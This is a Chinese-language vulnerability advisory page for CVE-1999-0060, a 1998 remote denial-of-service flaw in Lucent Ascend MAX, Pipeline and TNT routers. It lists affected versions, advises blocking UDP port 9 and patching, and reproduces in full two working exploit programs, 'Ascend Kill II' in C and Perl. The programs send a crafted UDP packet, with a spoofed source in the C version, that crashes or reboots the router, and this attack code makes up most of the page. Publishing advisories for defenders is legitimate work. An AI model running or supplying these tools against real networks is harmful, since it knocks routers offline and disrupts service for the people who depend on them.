安全研究

安全漏洞
Ascend MAX远程拒绝服务攻击漏洞

发布日期:1998-03-16
更新日期:1999-06-01

受影响系统:
Lucent Acsend MAX Router 5.0
Lucent Acsend MAX Router 4.0
Lucent Acsend MAX Router 3.0
Lucent Acsend MAX Router 2.0
Lucent Acsend MAX Router 1.0
Lucent Ascend Pipeline Router 6.0
Lucent Ascend Pipeline Router 5.0
Lucent Ascend Pipeline Router 4.0
Lucent Ascend Pipeline Router 3.0
Lucent Ascend Pipeline Router 2.0
Lucent Ascend Pipeline Router 1.0
Lucent Ascend TNT Router 2.0
Lucent Ascend TNT Router 1.0
不受影响系统:
Lucent Acsend MAX Router 5.0ap48
Lucent Ascend Pipeline Router 6.0.2
Lucent Ascend TNT Router 2.0.3
描述:
BUGTRAQ  ID: 714
CVE(CAN) ID: CVE-1999-0060

多种以"Ascend"命名,使用TAOS操作系统的Lucent路由器产品线支持配置工具通过UDP 9端口进行通信。

Ascend提供的MAX和Pipeline路由器的配置工具为了定位本地路由器的位置,会往UDP 9端口广播特殊格式的包。恶意攻击者发送类似的恶意包到相同端口可能造成MAX和Pipeline路由器崩溃。

<*来源:Secure Networks Inc.
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=89008264228833&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.
* see ftp.ascend.com.
*/

/*
* Ascend Kill II - C version
*
* (C) 1998 Rootshell - http://www.rootshell.com/
*
* Released: 3/16/98
*
* Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
* (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
*
* Sends a specially constructed UDP packet on the discard port (9)
* which cause Ascend routers to reboot.  (Warning! Ascend routers will
* process these if they are broadcast packets.)
*
* Compiled under RedHat 5.0 with glibc.
*
* NOTE: This program is NOT to be used for malicous purposes.  This is
*       intenteded for educational purposes only.  By using this program
*       you agree to use this for lawfull purposes ONLY.
*
* It is worth mentioning that Ascend has known about this bug for quite
* some time.
*
* Fix:
*
* Filter inbound UDP on port 9.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

/* This magic packet was taken from the Java Configurator */
char ascend_data[] =
  {
    0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
    0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
    0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
    0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
    0x50, 0x41, 0x53, 0x53};


unsigned short
in_cksum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
     struct sockaddr_in *sin;
     unsigned short int s, datalen, sport, dport;
     unsigned long int saddr, daddr;
     char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];
  char crashme[500];
  int i;

  ip.ihl = 5;
  ip.version = 4;
  ip.tos = rand () % 100;;
  ip.tot_len = htons (28 + datalen);
  ip.id = htons (31337 + (rand () % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum ((char *) &ip, sizeof (ip));
  udp.source = htons (sport);
  udp.dest = htons (dport);
  udp.len = htons (8 + datalen);
  udp.check = (short) 0;
  memcpy (packet, (char *) &ip, sizeof (ip));
  memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
  /* Append random garbage to the packet, without this the router
     will think this is a valid probe packet and reply. */
  for (i = 0; i < 500; i++)
    crashme[i] = rand () % 255;
  memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
  return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
                  (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}

unsigned int
lookup (host)
     char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

void
main (argc, argv)
     int argc;
     char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s, i;

  if (argc != 3)
    errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);

  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(saddr = lookup (argv[1])))
    err ("Unable to lookup source address.\n");
  if (!(daddr = lookup (argv[2])))
    err ("Unable to lookup destination address.\n");
  sin.sin_family = AF_INET;
  sin.sin_port = 9;
  sin.sin_addr.s_addr = daddr;
  if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
    {
      perror ("sendpkt_udp");
      err ("Error sending the UDP packet.\n");
    }
}

#!/usr/bin/perl
#
# Ascend Kill II - perl version
# (C) 1998 Rootshell - http://www.rootshell.com/ - <info@rootshell.com>
#
# Released: 3/17/98
#
# Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
#
#  NOTE: This program is NOT to be used for malicous purposes.  This is
#        intenteded for educational purposes only.  By using this program
#        you agree to use this for lawfull purposes ONLY.
#
#

use Socket;

require "getopts.pl";

sub AF_INET {2;}
sub SOCK_DGRAM {2;}

sub ascend_kill {
  $remotehost = shift(@_);
  chop($hostname = `hostname`);
  $port = 9;
  $SIG{'INT'} = 'dokill';
  $sockaddr = 'S n a4 x8';
  ($pname, $aliases, $proto) = getprotobyname('tcp');
  ($pname, $aliases, $port) = getservbyname($port, 'tcp')
  unless $port =~ /^\d+$/;
  ($pname, $aliases, $ptype, $len, $thisaddr) =
  gethostbyname($hostname);
  $this = pack($sockaddr, AF_INET, 0, $thisaddr);
  ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost);
  $that = pack($sockaddr, AF_INET, $port, $thataddr);
  socket(S, &AF_INET, &SOCK_DGRAM, 0);
    $msg = pack("c64",
    0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
    0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
    0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
    0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
    0x50, 0x41, 0x53, 0x53);
  for ($i=0; $i<500; $i++) {
    $msg .= pack("c1", 0xff);
  }
  send(S,$msg,0,$that) || die "send:$!";
}

if ($ARGV[0] eq '') {
  print "usage: akill2.pl <remote_host>\n";
  exit;
}

&ascend_kill($ARGV[0]);

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在边界防火墙禁止UDP 9端口的通信。

厂商补丁:

Lucent
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到最新的路由器软件版本:

http://www.lucent.com/

浏览次数:9738
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障